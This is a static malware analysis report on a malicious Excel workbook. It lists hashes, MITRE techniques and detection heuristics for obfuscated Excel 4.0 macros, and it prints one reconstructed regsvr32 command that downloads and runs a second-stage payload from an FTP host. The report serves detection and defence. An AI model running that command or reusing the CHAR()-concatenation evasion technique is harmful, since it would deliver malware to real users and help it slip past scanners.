Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 63d88b905b21862f…

MALICIOUS

Office (OOXML) / .XLSX

99.1 KB Created: 2020-03-10 01:07:44 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-11-07
MD5: a9ea4b32345f418f50f446a11c50e606 SHA-1: 2b6cba7a1fbeda2c3ba87d7dd002bddab567f50a SHA-256: 63d88b905b21862f8ef2aab18401adf5460cca1e4904b35f7324ae42d0190ecc
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.010 System Binary Proxy Execution: Regsvr32 T1105 Ingress Tool Transfer

The file contains Excel 4.0 macros that leverage WinAPI functions like Kernel32 and WinExec. The macros are designed to download and execute a second-stage payload using regsvr32.exe with the reconstructed command 'regsvr32.exe /u /n /s /i:ftp://tinker:bell@dcl5.kamika2e'. This indicates a downloader or droppper functionality.

Heuristics 3

  • Excel 4.0 macro sheet (1 sheet(s)) critical OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • Binary XLM macro sheet with WinAPI/download strings critical OOXML_XLM_BINARY_WINAPI_STRINGS
    Excel 4.0 macro sheet is stored as BIFF12/XLSB binary data and contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA, or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse.
  • XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD
    An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.bin
602758ec3e2bf1db1f79f727c2b006b4dbc0bdff01ccffb07698c1f24ee5c601		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 3925 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.